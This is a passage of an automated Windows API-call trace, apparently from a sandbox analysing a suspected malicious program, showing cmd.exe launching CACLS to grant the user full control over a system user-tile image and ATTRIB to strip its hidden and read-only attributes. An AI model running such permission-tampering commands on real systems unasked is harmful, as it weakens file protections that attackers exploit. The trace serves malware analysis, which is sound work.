(in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.508] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0185.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.508] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0185.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.508] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.508] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.508] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.509] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.509] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.509] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0185.509] GetEnvironmentStringsW () returned 0x260308* [0185.509] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.509] GetEnvironmentStringsW () returned 0x260308* [0185.509] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.509] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9c4 | out: phkResult=0x16e9c4*=0x40) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0xb8, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x0, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.509] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegCloseKey (hKey=0x40) returned 0x0 [0185.510] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e9c4 | out: phkResult=0x16e9c4*=0x40) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x40, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x1, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x0, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x9, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x4, lpData=0x16e9d0*=0x9, lpcbData=0x16e9c8*=0x4) returned 0x0 [0185.510] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e9cc, lpData=0x16e9d0, lpcbData=0x16e9c8*=0x1000 | out: lpType=0x16e9cc*=0x0, lpData=0x16e9d0*=0x9, lpcbData=0x16e9c8*=0x1000) returned 0x2 [0185.510] RegCloseKey (hKey=0x40) returned 0x0 [0185.510] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886393 [0185.510] srand (_Seed=0x5b886393) [0185.510] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" [0185.510] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\"" [0185.510] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.510] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x261a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0185.511] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.511] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.511] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.511] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0185.511] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0185.511] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0185.511] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0185.511] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0185.511] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0185.511] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0185.511] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0185.511] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0185.511] GetEnvironmentStringsW () returned 0x262458* [0185.511] FreeEnvironmentStringsW (penv=0x262458) returned 1 [0185.511] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.511] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0185.511] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0185.511] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0185.511] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0185.511] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0185.511] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0185.511] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0185.511] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0185.511] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0185.511] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.511] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f790, lpFilePart=0x16f78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f78c*="Desktop") returned 0x18 [0185.511] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.512] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f50c | out: lpFindFileData=0x16f50c) returned 0x260ae8 [0185.512] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0185.512] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f50c | out: lpFindFileData=0x16f50c) returned 0x260ae8 [0185.512] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0185.512] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f50c | out: lpFindFileData=0x16f50c) returned 0x260ae8 [0185.512] FindClose (in: hFindFile=0x260ae8 | out: hFindFile=0x260ae8) returned 1 [0185.512] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.512] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0185.512] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0185.512] GetEnvironmentStringsW () returned 0x260308* [0185.513] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.513] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.513] GetConsoleOutputCP () returned 0x1b5 [0185.513] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.513] GetUserDefaultLCID () returned 0x409 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f8d0, cchData=128 | out: lpLCData="0") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f8d0, cchData=128 | out: lpLCData="0") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f8d0, cchData=128 | out: lpLCData="1") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0185.514] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0185.514] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.515] GetConsoleTitleW (in: lpConsoleTitle=0x2509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.515] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.515] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0185.515] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0185.515] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0185.516] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0185.516] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0185.517] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0185.517] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0185.517] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0185.517] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0185.517] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0185.517] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0185.519] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0185.519] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0185.519] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0185.519] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0185.519] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0185.519] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0185.519] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0185.521] GetConsoleTitleW (in: lpConsoleTitle=0x16f564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.522] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.522] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.522] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.522] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.522] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.522] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.522] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.522] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.522] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.522] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.522] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.522] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.522] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.522] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.522] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.522] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.522] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.522] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.522] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.522] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.522] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.522] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.522] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.522] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.523] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.523] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.523] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.523] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.523] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.523] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.523] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.523] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.523] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.523] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.523] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.523] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.523] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.523] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.523] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.523] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.523] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.523] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.523] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.523] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.523] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.523] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.523] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.523] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.523] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.523] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.523] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0185.523] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0185.523] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0185.524] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0185.524] SetErrorMode (uMode=0x0) returned 0x0 [0185.524] SetErrorMode (uMode=0x1) returned 0x0 [0185.524] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x261e98, lpFilePart=0x16f084 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f084*="Desktop") returned 0x18 [0185.524] SetErrorMode (uMode=0x0) returned 0x1 [0185.524] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.524] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.529] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.530] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.530] GetLastError () returned 0x2 [0185.530] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.530] GetLastError () returned 0x2 [0185.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x262180 [0185.531] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0185.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0xffffffff [0185.531] GetLastError () returned 0x2 [0185.531] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x16ee00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ee00) returned 0x262180 [0185.531] FindClose (in: hFindFile=0x262180 | out: hFindFile=0x262180) returned 1 [0185.531] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.531] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.531] GetConsoleTitleW (in: lpConsoleTitle=0x16f2f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.531] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f180, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f248 | out: lpAttributeList=0x16f180, lpSize=0x16f248) returned 1 [0185.531] UpdateProcThreadAttribute (in: lpAttributeList=0x16f180, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f240, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f180, lpPreviousValue=0x0) returned 1 [0185.531] GetStartupInfoW (in: lpStartupInfo=0x16f13c | out: lpStartupInfo=0x16f13c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.531] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.532] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f1dc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f228 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x16f228*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe1c, dwThreadId=0xd30)) returned 1 [0185.535] CloseHandle (hObject=0x4c) returned 1 [0185.535] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.535] GetEnvironmentStringsW () returned 0x260308* [0185.535] FreeEnvironmentStringsW (penv=0x260308) returned 1 [0185.535] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.568] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f11c | out: lpExitCode=0x16f11c*=0x0) returned 1 [0185.568] CloseHandle (hObject=0x50) returned 1 [0185.568] _vsnwprintf (in: _Buffer=0x16f264, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f128 | out: _Buffer="00000000") returned 8 [0185.568] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.568] GetEnvironmentStringsW () returned 0x262410* [0185.568] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.568] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.568] GetEnvironmentStringsW () returned 0x262410* [0185.568] FreeEnvironmentStringsW (penv=0x262410) returned 1 [0185.568] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f180 | out: lpAttributeList=0x16f180) [0185.568] GetConsoleTitleW (in: lpConsoleTitle=0x16f564, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.569] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 